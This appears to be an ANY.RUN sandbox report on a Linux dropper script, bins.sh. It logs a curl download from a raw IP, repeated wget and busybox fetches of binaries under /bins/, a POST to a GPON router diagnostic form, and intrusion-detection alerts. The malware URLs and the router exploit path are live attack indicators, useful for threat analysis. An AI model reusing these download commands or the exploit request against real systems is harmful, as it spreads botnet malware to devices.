38748curl -O http://37.44.238.68/bins/flFp11gOKS5O1KbuHBReEPxs9O6CXUsqN4/snap/snapd/20290/usr/bin/snapbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Executable files
0
Suspicious files
0
Text files
0
Unknown types
0

Dropped files

No data
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
95
TCP/UDP connections
13 646
DNS requests
8
Threats
125

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
38967
busybox
GET
37.44.238.68:80
http://37.44.238.68/bins/vvOzd21gp1VMiBa4WKG078qzhKaDahP2IQ
unknown
GET
37.44.238.68:80
http://37.44.238.68/bins/4muyoQFtQu8OaZsYKV4wOsXp18QNsxRCaK
unknown
GET
204
185.125.190.96:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
38822
busybox
GET
37.44.238.68:80
http://37.44.238.68/bins/NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB
unknown
38856
busybox
GET
37.44.238.68:80
http://37.44.238.68/bins/h05dLumwbS5NIdaMUwe36sFjp7EsrqlZaX
unknown
38791
busybox
GET
37.44.238.68:80
http://37.44.238.68/bins/flFp11gOKS5O1KbuHBReEPxs9O6CXUsqN4
unknown
39003
busybox
GET
37.44.238.68:80
http://37.44.238.68/bins/4muyoQFtQu8OaZsYKV4wOsXp18QNsxRCaK
unknown
38973
NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted)
POST
404
38.165.113.225:80
http://127.0.0.1:80/GponForm/diag_Form?images/
unknown
GET
200
37.44.238.68:80
http://37.44.238.68/bins/NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB
unknown
GET
200
37.44.238.68:80
http://37.44.238.68/bins/h05dLumwbS5NIdaMUwe36sFjp7EsrqlZaX
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
484
avahi-daemon
224.0.0.251:5353
unknown
185.125.190.98:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
91.189.91.97:80
connectivity-check.ubuntu.com
Canonical Group Limited
US
whitelisted
185.125.190.96:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
38747
wget
37.44.238.68:80
conn.masjesu.zip
Harmony Hosting SARL
FR
unknown
37.44.238.68:80
conn.masjesu.zip
Harmony Hosting SARL
FR
unknown
38791
busybox
37.44.238.68:80
conn.masjesu.zip
Harmony Hosting SARL
FR
unknown
38796
wget
37.44.238.68:80
conn.masjesu.zip
Harmony Hosting SARL
FR
unknown
38822
busybox
37.44.238.68:80
conn.masjesu.zip
Harmony Hosting SARL
FR
unknown
38830
wget
37.44.238.68:80
conn.masjesu.zip
Harmony Hosting SARL
FR
unknown

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.74.206
  • 2a00:1450:4001:830::200e
whitelisted
connectivity-check.ubuntu.com
  • 185.125.190.96
  • 91.189.91.97
  • 185.125.190.48
  • 91.189.91.98
  • 185.125.190.98
  • 185.125.190.17
  • 91.189.91.49
  • 91.189.91.96
  • 185.125.190.97
  • 91.189.91.48
  • 185.125.190.18
  • 185.125.190.49
  • 2620:2d:4002:1::197
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::96
  • 2620:2d:4000:1::2b
  • 2001:67c:1562::23
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::98
  • 2620:2d:4000:1::2a
  • 2001:67c:1562::24
  • 2620:2d:4000:1::97
  • 2620:2d:4002:1::196
  • 2620:2d:4000:1::23
whitelisted
conn.masjesu.zip
  • 37.44.238.68
  • 87.121.86.228
unknown
170.100.168.192.in-addr.arpa
unknown

Threats

PID
Process
Class
Message
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Misc Attack
ET COMPROMISED Known Compromised or Hostile Host Traffic group 18
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Misc activity
ET INFO Observed DNS Query to .zip TLD
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
bins.sh